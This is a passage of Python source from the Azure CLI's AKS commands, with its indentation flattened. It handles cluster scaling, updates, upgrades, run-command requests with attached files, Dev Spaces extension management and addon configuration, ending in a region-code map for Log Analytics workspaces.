raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
enable_managed_identity=False,
assign_identity=None,
yes=False,
no_wait=False,
enable_azure_rbac=False,
disable_azure_rbac=False):
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and
not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
not no_uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub and
not windows_admin_password and
not enable_managed_identity and
not assign_identity):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--no-uptime-sla" or '
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--windows-admin-password" or '
'"--enable-managed-identity" or '
'"--assign-identity" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac"')
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/"'
'"--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
# ids -> i_ds due to track 2 naming issue
instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise MutuallyExclusiveArgumentError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update '
'the cluster to use {} managed identity.\n After updating, your '
'cluster\'s control plane and addon pods will switch to use managed '
'identity, but kubelet will KEEP USING SERVICE PRINCIPAL '
'until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to '
'update the cluster to use {} managed identity. \nAre you sure you want to '
'perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
# pylint: disable=line-too-long
user_assigned_identity = {
assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME +
'Linux'].enabled
return _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
None,
no_wait)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# if this cluster have Azure AD enabled, we should pass user token.
# so the command execution also using current user identity.
# here we aquire token for AKS managed server AppID (same id for all cloud)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
